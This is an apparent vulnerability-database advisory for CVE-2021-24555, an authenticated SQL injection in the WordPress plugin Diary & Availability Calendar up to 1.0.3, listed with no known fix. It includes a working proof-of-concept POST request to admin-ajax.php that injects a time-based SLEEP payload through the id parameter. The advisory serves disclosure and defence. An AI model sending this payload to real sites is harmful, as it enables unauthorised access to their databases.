WordPress Plugin Vulnerabilities

Diary & Availability Calendar <= 1.0.3 - Authenticated (subscriber+) SQL Injection

Description

The daac_delete_booking_callback function, hooked to the daac_delete_booking AJAX action, takes the id POST parameter which is passed into the SQL statement without proper sanitisation, validation or escaping, leading to a SQL Injection issue. Furthermore, the ajax action is lacking any CSRF and capability check, making it available to any authenticated user.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 172.28.128.50
Content-Length: 40
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://172.28.128.50
Referer: http://172.28.128.50/wp-admin/admin.php?page=daac-calendar
Accept-Language: en-US,en;q=0.9
Cookie: [any authenticated user]
Connection: close

action=daac_delete_booking&id=1%20AND%20(SELECT%201209%20FROM%20(SELECT(SLEEP(5)))bOrN)

Affects Plugins

Plugin icon
diary-availability-calendar
No known fix

References

CVE
CVE-2021-24555
URL
https://codevigilant.com/disclosure/2021/wp-plugin-diary-availability-calendar/

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
8.8 (high)

Miscellaneous

Original Researcher
Shreya Pohekar of Codevigilant Project
Verified
Yes
WPVDB ID
8eafd84b-6214-450b-869b-0afe7cca4c5f

Timeline

Publicly Published
2021-07-24 (about 2 years ago)
Added
2021-07-24 (about 2 years ago)
Last Updated
2022-04-12 (about 2 years ago)

Other

Published
Title
Published
2022-02-16
Title
WP Statistics < 13.1.6 - Unauthenticated Blind SQL Injection via current_page_type
Published
2021-11-01
Title
BSK PDF Manager < 3.1.2 - Admin+ SQL Injection
Published
2017-05-21
Title
Surveys 1.01.8 - Authenticated SQL Injection
Published
2021-02-08
Title
Welcart e-Commerce < 2.1.1 - Authenticated SQL Injection
Published
2014-08-01
Title
WP Easy Gallery 2.7 - admin/overview.php galleryId Parameter SQL Injection